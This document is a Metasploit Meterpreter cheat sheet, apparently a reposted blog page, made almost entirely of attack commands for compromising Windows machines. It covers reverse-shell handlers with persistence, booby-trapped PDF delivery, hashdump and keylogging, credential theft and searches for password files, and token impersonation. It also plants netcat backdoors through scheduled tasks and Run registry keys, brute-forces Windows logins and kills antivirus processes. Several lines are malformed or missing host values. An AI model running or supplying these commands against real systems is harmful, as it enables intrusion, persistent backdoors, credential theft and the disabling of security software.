
Metasploit Meterpreter Cheat Sheet Reference

Posted originally in:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 21
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set AutoRunScript persistence -r -p 21 -A -X -i 30
msf exploit(handler) > exploit -j -z

# file_autopwn

root@bt:~# rm -Rf /tmp/1
root@bt:~# mkdir /tmp/1
root@bt:~# rm -Rf ~/.msf3
root@bt:~# wget -O /tmp/file3.pdf

msf > db_driver sqlite3
msf > db_create pentest11
msf > setg LHOST
msf > setg LPORT 21
msf > setg SRVPORT 21
msf > setg LPORT_WIN32 21
msf > setg INFILENAME /tmp/file3.pdf

msf > use auxiliary/server/file_autopwn
msf auxiliary(file_autopwn) > set OUTPATH /tmp/1
msf auxiliary(file_autopwn) > set URIPATH /msf
msf auxiliary(file_autopwn) > set SSL true
msf auxiliary(file_autopwn) > set ExitOnSession false
msf auxiliary(file_autopwn) > set PAYLOAD windows/meterpreter/reverse_tcp
msf auxiliary(file_autopwn) > setg PAYLOAD windows/meterpreter/reverse_tcp
msf auxiliary(file_autopwn) > set AutoRunScript persistence -r -p 21 -A -X -i 30
msf auxiliary(file_autopwn) > run

# tab completion lists all available scripts
run [tab]

# persistence — broken if you pass a DNS name instead of an IP address
run persistence -r -p 21 -A -X -i 30

run get_pidgin_creds


# SYSTEM shell (pick a process that runs as SYSTEM)
migrate 376

# hijack session tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"

# escalate to SYSTEM
use priv

execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

# list the most-used apps
run prefetchtool -x 20

# list installed apps
run prefetchtool -p

run get_local_subnets

# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office

# alternative: recursive download
download -r "%USERPROFILE%\\desktop"  ~/
download -r "%USERPROFILE%\\my documents"  ~/

# alternative: spawn a shell without SYSTEM privileges
execute -f cmd.exe -H -c -i -t

# runs wmic and other enumeration commands
run winenum

# reverse shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"

# Example: download Netcat via tftp and then run it as a backdoor.
run schtasksabuse-dev -t -c "tftp -i GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t -c "tftp -i GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4

# VNC / port forwarding (for Linux)
run vnc

# privilege escalation
run kitrap0d

run getgui

# somewhat broken — see "sdt cleaner" / NtTerminateProcess
run killav

run winemun

run memdump

run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32

reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list

reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys

reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32

upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

migrate 520
portfwd add -L 104.4.4 -l 6666 -r -p 80"
portfwd add -L -l -r -p 6666

run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787

run msf_bind
run msf_bind -p 1975



run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d
run netenum -rl -r
run netenum -st -d
run netenum -ps -r

# Windows login brute-force Meterpreter script
run winbf -h

# upload a script or executable and run it

# Using the payload as a backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe"  /ED 11/11/2011

# kill AV: this does not unload it from memory — a reboot is still needed, or kill it from memory; the Darkspy, Seem and Icesword GUIs can kill the tasks
catchme.exe  -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -O "c:\Program Files\Kaspersky\avp.exe" dummy

